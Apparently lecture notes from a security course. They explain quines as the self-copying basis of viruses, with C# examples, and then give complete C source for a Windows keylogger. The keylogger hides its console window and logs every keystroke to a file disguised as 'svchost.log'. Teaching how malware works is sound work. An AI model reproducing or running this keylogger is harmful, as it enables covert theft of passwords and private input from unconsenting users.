Malicious Software
Although this includes a wide variety of software, and you should read chapter 10 in preparation for the exam, I'm going to concentrate on two types in this lecture: Viruses and Keyloggers.
Viruses
Viruses must be able to copy themselves verbatim onto other systems. The question is how? Can code (ascii or otherwise) make a copy of itself? See if you can devise a logical sequence of actions that will output the same sequence of actions.
In general, the method used to create a quine in any programming language is to have, within the program, two pieces: (a) code used to do the actual printing and (b) data that represents the textual form of the code (e.g., progdata in the first C example below). The code functions by using the data to print the code (which makes sense since the data represents the textual form of the code), but it also uses the data, processed in a simple way (e.g., quote() below) to print the textual representation of the data itself. (see: http://en.wikipedia.org/wiki/Quine_%28computing%29)
Here is one written in C#:
To make it work perfectly, you need to reformat it as follows:
1 using System;class Q{static void Main(){string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));}}
Does that look a bit esoteric? Look at a longer one, but one that is easier to follow:
1 using System;
2 class P
3 {
4 static void Main()
5 {
6 string[] S = {
7 " Console.WriteLine(\"using System;\");",
8 " Console.WriteLine(\"class P {\");",
9 " Console.WriteLine(\" static void Main() {\");",
10 "",
11 " Console.WriteLine(\" string[] S = {\");",
12 " foreach (string line in S) {",
13 " string escapedLine = line.Replace(@\"\\\", @\"\\\\\")",
14 " .Replace(\"\\\"\", \"\\\\\\\"\");",
15 " Console.WriteLine(\"\\\"{0}\\\",\", escapedLine);",
16 " }",
17 " Console.WriteLine(\" };\");",
18 "",
19 " foreach (string line in S) Console.WriteLine(line);",
20 "",
21 " Console.WriteLine(\" }\");",
22 " Console.WriteLine(\"}\");",
23 };
24 Console.WriteLine("using System;");
25 Console.WriteLine("class P {");
26 Console.WriteLine(" static void Main() {");
27
28 Console.WriteLine(" string[] S = {");
29 foreach (string line in S)
30 {
31 string escapedLine = line.Replace(@"\", @"\\")
32 .Replace("\"", "\\\"");
33 Console.WriteLine("\"{0}\",", escapedLine);
34 }
35 Console.WriteLine(" };");
36
37 foreach (string line in S) Console.WriteLine(line);
38
39 Console.WriteLine(" }");
40 Console.WriteLine("}");
41 }
42 }
Keyloggers
The following source code will get you started. To just download the examples use the links at the end of this section.
1 int _tmain(int argc, _TCHAR* argv[])
2 {
3 HWND stealth; /*creating stealth (window is not visible)*/
4 AllocConsole();
5 stealth=FindWindowA("ConsoleWindowClass",NULL);
6 ShowWindow(stealth,0);
7 int t=get_keys();
8 return t;
9 }
10
11 int get_keys(void)
12 {
13 short character;
14 while(1)
15 {
16 for(character=8;character<=222;character++)
17 {
18 if(GetAsyncKeyState(character)==-32767)
19 {
20 FILE *file;
21 file=fopen("svchost.log","a+");
22 if(file==NULL)
23 {
24 return 1;
25 }
26 if(file!=NULL)
27 {
28 if((character>=39)&&(character<=64))
29 {
30 fputc(character,file);
31 fclose(file);
32 break;
33 }
34 else if((character>64)&&(character<91))
35 {
36 character+=32;
37 fputc(character,file);
38 fclose(file);
39 break;
40 }
41 else
42 {
43 switch(character)
44 {
45 case VK_SPACE:
46 fputc(' ',file);
47 fclose(file);
48 break;
49 case VK_SHIFT:
50 fputs("[SHIFT]",file);
51 fclose(file);
52 break;
53 case VK_RETURN:
54 fputs("\n[ENTER]",file);
55 fclose(file);
56 break;
57 case VK_BACK:
58 fputs("[BACKSPACE]",file);
59 fclose(file);
60 break;
61 case VK_TAB:
62 fputs("[TAB]",file);
63 fclose(file);
64 break;
65 case VK_CONTROL:
66 fputs("[CTRL]",file);
67 fclose(file);
68 break;
69 case VK_DELETE:
70 fputs("[DEL]",file);
71 fclose(file);
72 break;
73 case VK_OEM_1:
74 fputs("[;:]",file);
75 fclose(file);
76 break;
77 case VK_OEM_2:
78 fputs("[/?]",file);
79 fclose(file);
80 break;
81 case VK_OEM_3:
82 fputs("[`~]",file);
83 fclose(file);
84 break;
85 case VK_OEM_4:
86 fputs("[ [{ ]",file);
87 fclose(file);
88 break;
89 case VK_OEM_5:
90 fputs("[\\|]",file);
91 fclose(file);
92 break;
93 case VK_OEM_6:
94 fputs("[ ]} ]",file);
95 fclose(file);
96 break;
97 case VK_OEM_7:
98 fputs("['\"]",file);
99 fclose(file);
100 break;
101 case VK_NUMPAD0:
102 fputc('0',file);
103 fclose(file);
104 break;
105 case VK_NUMPAD1:
106 fputc('1',file);
107 fclose(file);
108 break;
109 case VK_NUMPAD2:
110 fputc('2',file);
111 fclose(file);
112 break;
113 case VK_NUMPAD3:
114 fputc('3',file);
115 fclose(file);
116 break;
117 case VK_NUMPAD4:
118 fputc('4',file);
119 fclose(file);
120 break;
121 case VK_NUMPAD5:
122 fputc('5',file);
123 fclose(file);
124 break;
125 case VK_NUMPAD6:
126 fputc('6',file);
127 fclose(file);
128 break;
129 case VK_NUMPAD7:
130 fputc('7',file);
131 fclose(file);
132 break;
133 case VK_NUMPAD8:
134 fputc('8',file);
135 fclose(file);
136 break;
137 case VK_NUMPAD9:
138 fputc('9',file);
139 fclose(file);
140 break;
141 case VK_CAPITAL:
142 fputs("[CAPS LOCK]",file);
143 fclose(file);
144 break;
145 default:
146 fclose(file);
147 break;
148 }
149 }
150 }
151 }
152 }
153
154 }
155 return EXIT_SUCCESS;
156 }
The source files are here:
Zipped Projects
You can get the Visual Studio 2010 projects in zipped format here:
Quine: Quine.zip (C# project)
Keylogger: KeyLogger.zip (C++ project)